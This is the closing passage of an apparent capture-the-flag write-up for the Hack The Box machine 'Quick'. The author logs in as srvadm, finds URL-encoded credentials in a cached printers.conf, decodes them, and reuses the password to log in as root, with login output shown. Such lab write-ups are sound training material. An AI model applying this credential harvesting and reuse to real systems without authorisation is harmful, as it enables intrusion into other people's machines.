</pre></table></code></div></div><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>ssh <span class="nt">-i</span> adm_id srvadm@quick.htb
</pre></table></code></div></div><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
</pre><td class="rouge-code"><pre>Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue May  5 16:11:07 UTC 2020

  System load:  1.28               Users logged in:                2
  Usage of /:   30.3% of 19.56GB   IP address for ens33:           10.10.10.186
  Memory usage: 25%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    154


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

54 packages can be updated.
28 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue May  5 11:47:47 2020 from 10.10.16.81
srvadm@quick:~$ 
</pre></table></code></div></div><h2 id="get-root">Get root</h2><p>If i run <code class="highlighter-rouge">ls -la</code> i can see a <code class="highlighter-rouge">.cache</code> folder.<br /> there is a config file inside this folder called <code class="highlighter-rouge">conf.d</code> that contain a <code class="highlighter-rouge">printers.conf</code>:</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer
</pre></table></code></div></div><p>by URL decoding this link using <a href="https://www.urldecoder.org/">online</a> url decoder i got</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>https://srvadm@quick.htb:&amp;ftQ4K3SGde8?@printerv3.quick.htb/printer
</pre></table></code></div></div><p>trying to ssh to root using <code class="highlighter-rouge">&amp;ftQ4K3SGde8?</code></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
</pre><td class="rouge-code"><pre>root@kali:~/Desktop/hacktheboxmachine/quick# ssh root@quick.htb
root@quick.htb's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue May  5 16:16:43 UTC 2020

  System load:  1.7                Users logged in:                2
  Usage of /:   30.3% of 19.56GB   IP address for ens33:           10.10.10.186
  Memory usage: 25%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    154


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

54 packages can be updated.
28 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue May  5 11:48:13 2020 from 10.10.16.81
root@quick:~# wc -c root.txt
33 root.txt
root@quick:~# 
</pre></table></code></div></div><p>Finally rooted :) Your Feedback is appreciated.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>Hackthebox</a>, <a href='/categories/retired/'>retired</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/curl/" class="post-tag no-text-decoration" >curl</a> <a href="/tags/xslt-injection/" class="post-tag no-text-decoration" >XSLT-Injection</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Quick - yassine&url=https://0xyassine.github.io//posts/Quick/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Quick - yassine&u=https://0xyassine.github.io//posts/Quick/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Quick - yassine&url=https://0xyassine.github.io//posts/Quick/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/traceback/">Traceback</a></li><li><a href="/posts/cache/">Cache</a></li><li><a href="/posts/admirer/">Admirer</a></li><li><a href="/posts/Quick/">Quick</a></li><li><a href="/posts/ForwardSlash/">ForwardSlash</a></li></ul></div><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <!-- The trending tags list v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT Licensed --> <a class="post-tag" href="/tags/crypto/">crypto</a> <a class="post-tag" href="/tags/web-shell/">web shell</a> <a class="post-tag" href="/tags/sqlmap/">sqlmap</a> <a class="post-tag" href="/tags/smbclient/">smbclient</a> <a class="post-tag" href="/tags/python/">python</a> <a class="post-tag" href="/tags/mysql/">mysql</a> <a class="post-tag" href="/tags/microsoft-azure/">microsoft azure</a> <a class="post-tag" href="/tags/john/">john</a> <a class="post-tag" href="/tags/gtfobins/">gtfobins</a> <a class="post-tag" href="/tags/docker/">docker</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-3">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="post-extend-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/ForwardSlash/" class="btn btn-outline-primary"><p>ForwardSlash</p></a> <a href="/posts/admirer/" class="btn btn-outline-primary"><p>Admirer</p></a></div><!-- The Disqus lazy loading. Powered by: https://osvaldas.info/lazy-loading-disqus-comments v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT License --><div id="disqus" class="pt-2 pb-4"><p class="font-italic text-muted small">Comments powered by <a href="https://disqus.com/">Disqus</a>.</p></div><script src="/assets/lib/jquery.disqusloader.min.js"></script> <script> var options = { scriptUrl: '//0xyassine.disqus.com/embed.js', disqusConfig: function() { this.page.url = 'https://0xyassine.github.io//posts/Quick/'; this.page.identifier = '/posts/Quick/'; } }; $.disqusLoader('#disqus', options); </script> <!-- The related posts of current post. Placed in the bottom of every single post. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-4 mb-2 mb-sm-4 pb-2"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/openadmin/"><div class="card-body"> <span class="timeago small"> May 1, 2020 <i class="unloaded">2020-05-01T00:00:00+03:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>OpenAdmin</h3><div class="text-muted small"><p>OpenAdmin from HackTheBox OpenAdmin was retired .It was easy and fun box with web attack and priv escalation techniques so let’s start … nmap scan: 1 nmap -sV -sC 10.10.10.171 -v 1 2 3 4 5...</p></div></div></a></div><div class="card"> <a href="/posts/obscurity/"><div class="card-body"> <span class="timeago small"> May 8, 2020 <i class="unloaded">2020-05-08T00:00:00+03:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Obscurity</h3><div class="text-muted small"><p>Obscurity from HackTheBox Obscurity was retired . It was a Good box with a lot of python auditing … nmap scan 1 nmap -sV -sC -v 10.10.10.168 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19...</p></div></div></a></div><div class="card"> <a href="/posts/ForwardSlash/"><div class="card-body"> <span class="timeago small"> May 9, 2020 <i class="unloaded">2020-05-09T00:00:00+03:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>ForwardSlash</h3><div class="text-muted small"><p>ForwardSlash from HackTheBox Good box with new bypassing techniques and simple cryto … Note : add forwardslash.htb to your hosts file nmap scan 1 nmap -sV -sC forwardslash.htb -v 1 2 ...</p></div></div></a></div></div></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const observer = lozad(); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2021 <a href="https://www.facebook.com/mouhamed.yassin.90">Mohammad YASSINE</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted">Trending Tags</h4><!-- The trending tags list v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT Licensed --> <a class="post-tag" href="/tags/crypto/">crypto</a> <a class="post-tag" href="/tags/web-shell/">web shell</a> <a class="post-tag" href="/tags/sqlmap/">sqlmap</a> <a class="post-tag" href="/tags/smbclient/">smbclient</a> <a class="post-tag" href="/tags/python/">python</a> <a class="post-tag" href="/tags/mysql/">mysql</a> <a class="post-tag" href="/tags/microsoft-azure/">microsoft azure</a> <a class="post-tag" href="/tags/john/">john</a> <a class="post-tag" href="/tags/gtfobins/">gtfobins</a> <a class="post-tag" href="/tags/docker/">docker</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js" integrity="sha256-qcLR00zq6pJk4je3MLgAri8Nn+ZumUlXgTKR2H/xCY0=" crossorigin="anonymous"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://0xyassine.github.io/{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
